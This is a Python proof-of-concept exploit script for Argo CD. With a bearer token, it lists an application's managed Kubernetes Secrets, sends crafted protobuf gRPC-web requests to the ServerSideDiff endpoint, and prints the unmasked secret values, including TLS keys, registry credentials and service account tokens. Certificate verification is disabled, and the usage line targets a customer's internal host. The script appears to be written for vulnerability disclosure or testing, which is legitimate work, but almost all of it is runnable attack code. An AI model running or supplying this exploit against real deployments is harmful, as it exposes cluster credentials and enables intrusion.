#!/usr/bin/env python3
"""
Argo CD ServerSideDiff Secret Extraction PoC
Usage:
python3 poc.py <host> <token> <app> <project>
Example:
python3 poc.py argocd.int.<customer>.com eyJhbG... my-app my-project
"""
import base64
import http.client
import json
import ssl
import struct
import sys
import urllib.parse
from collections import defaultdict
def encode_varint(v):
out = []
while v > 0x7f:
out.append((v & 0x7f) | 0x80)
v >>= 7
out.append(v & 0x7f)
return bytes(out)
def encode_str(field, val):
tag = (field << 3) | 2
raw = val.encode()
return encode_varint(tag) + encode_varint(len(raw)) + raw
def encode_bytes(field, val):
tag = (field << 3) | 2
return encode_varint(tag) + encode_varint(len(val)) + val
def encode_bool(field, val):
tag = (field << 3) | 0
return encode_varint(tag) + encode_varint(1 if val else 0)
def decode_varint(data, pos):
val, shift = 0, 0
while pos < len(data):
b = data[pos]; pos += 1
val |= (b & 0x7f) << shift; shift += 7
if not (b & 0x80):
break
return val, pos
def decode_fields(data):
fields = defaultdict(list)
pos = 0
while pos < len(data):
tag, pos = decode_varint(data, pos)
wtype = tag & 0x07
if wtype == 0:
val, pos = decode_varint(data, pos)
fields[tag >> 3].append(val)
elif wtype == 2:
length, pos = decode_varint(data, pos)
fields[tag >> 3].append(data[pos:pos + length])
pos += length
elif wtype == 5:
fields[tag >> 3].append(data[pos:pos + 4]); pos += 4
elif wtype == 1:
fields[tag >> 3].append(data[pos:pos + 8]); pos += 8
else:
break
return dict(fields)
# -- grpc-web framing --
def grpc_frame(payload):
return b"\x00" + struct.pack(">I", len(payload)) + payload
def decode_grpc_frames(data):
frames, pos = [], 0
while pos + 5 <= len(data):
flag = data[pos]
length = struct.unpack(">I", data[pos+1:pos+5])[0]
pos += 5
frames.append((flag, data[pos:pos+length]))
pos += length
return frames
# -- http helpers --
def make_conn(host):
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return http.client.HTTPSConnection(host, 443, context=ctx, timeout=10)
def rest_get(conn, path, token):
conn.request("GET", path, headers={
"Authorization": "Bearer " + token,
"Accept": "application/json",
})
resp = conn.getresponse()
body = resp.read()
if resp.status != 200:
return None, "HTTP %d" % resp.status
return json.loads(body), None
def grpc_post(conn, token, payload):
conn.request("POST", "/application.ApplicationService/ServerSideDiff",
body=grpc_frame(payload), headers={
"Content-Type": "application/grpc-web+proto",
"Accept": "application/grpc-web+proto",
"X-Grpc-Web": "1",
"Authorization": "Bearer " + token,
})
resp = conn.getresponse()
raw = resp.read()
if resp.status != 200:
return None, "HTTP %d" % resp.status
frames = decode_grpc_frames(raw)
for flag, fdata in frames:
if flag == 0:
return fdata, None
return None, "no data frame in response"
# -- main --
def main():
if len(sys.argv) != 5:
print("Usage: python3 poc.py <host> <token> <app> <project>")
sys.exit(1)
host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
conn = make_conn(host)
# step 1: list managed resources for the app, find secrets
print("[*] Fetching managed resources for %s/%s ..." % (project, app_name))
data, err = rest_get(conn, "/api/v1/applications/%s/managed-resources" % urllib.parse.quote(app_name), token)
if err:
print("[-] Failed: %s" % err); sys.exit(1)
secrets = []
for r in data.get("items", []):
if r.get("kind") != "Secret":
continue
name = r.get("name", "")
ns = r.get("namespace", "")
live = r.get("liveState", "")
stype = "Opaque"
if live and live != "null":
try:
stype = json.loads(live).get("type", "Opaque")
except Exception:
pass
secrets.append((name, ns, stype, live))
if not secrets:
print("[-] No secrets found in managed resources"); sys.exit(0)
print("[+] Found %d secrets" % len(secrets))
# step 2: call ServerSideDiff for each secret
total_extracted = 0
for sname, sns, stype, live_json in secrets:
# build minimal target manifest (no data field)
target = {"apiVersion": "v1", "kind": "Secret",
"metadata": {"name": sname, "namespace": sns},
"type": stype}
# copy required annotations from live state for SA tokens
if live_json and live_json != "null":
try:
live_annots = json.loads(live_json).get("metadata", {}).get("annotations", {})
k8s_annots = {k: v for k, v in live_annots.items() if k.startswith("kubernetes.io/")}
if k8s_annots:
target["metadata"]["annotations"] = k8s_annots
except Exception:
pass
# for TLS secrets, include required placeholder keys
if stype == "kubernetes.io/tls":
target["data"] = {
"tls.crt": base64.b64encode(b"PLACEHOLDER").decode(),
"tls.key": base64.b64encode(b"PLACEHOLDER").decode(),
}
elif stype == "kubernetes.io/dockerconfigjson":
target["data"] = {".dockerconfigjson": base64.b64encode(b'{"auths":{}}').decode()}
# encode the grpc request
lr = b""
lr += encode_str(2, "Secret") # kind
lr += encode_str(3, sns) # namespace
lr += encode_str(4, sname) # name
if live_json:
lr += encode_str(6, live_json) # liveState
lr += encode_bool(12, True) # modified
query = encode_str(1, app_name)
query += encode_str(3, project)
query += encode_bytes(4, lr)
query += encode_str(5, json.dumps(target))
# reconnect for each call (simple, no pool needed for poc)
try:
conn = make_conn(host)
resp_data, err = grpc_post(conn, token, query)
except Exception as e:
print(" [!] %s/%s: %s" % (sns, sname, e))
continue
if err:
print(" [!] %s/%s: %s" % (sns, sname, err))
continue
# parse response
resp_fields = decode_fields(resp_data)
for item_bytes in resp_fields.get(1, []):
if not isinstance(item_bytes, bytes):
continue
ifields = decode_fields(item_bytes)
# field 5 = targetState (predictedLive — has real values from etcd)
for raw in ifields.get(5, []):
if not isinstance(raw, bytes):
continue
try:
obj = json.loads(raw)
except Exception:
continue
if obj.get("kind") != "Secret":
continue
secret_data = obj.get("data", {})
if not secret_data:
continue
# check for real (non-masked) values
real_keys = {}
for k, v in secret_data.items():
if not v:
continue
if all(c == "+" for c in v):
continue # masked by argocd
try:
decoded = base64.b64decode(v)
text = decoded.decode("utf-8", errors="replace")
except Exception:
continue
if all(c == "+" for c in text) and text:
continue # masked (base64 of +++...)
real_keys[k] = text
if real_keys:
total_extracted += 1
print("\n [***] %s/%s (%s)" % (sns, sname, stype))
print(" %d/%d keys extracted:" % (len(real_keys), len(secret_data)))
for k in sorted(real_keys):
v = real_keys[k].replace("\n", "\\n")
if len(v) > 120:
v = v[:120] + "..."
print(" %s: %s" % (k, v))
print("\n[*] Done. %d secrets with real values extracted." % total_extracted)
if __name__ == "__main__":
main()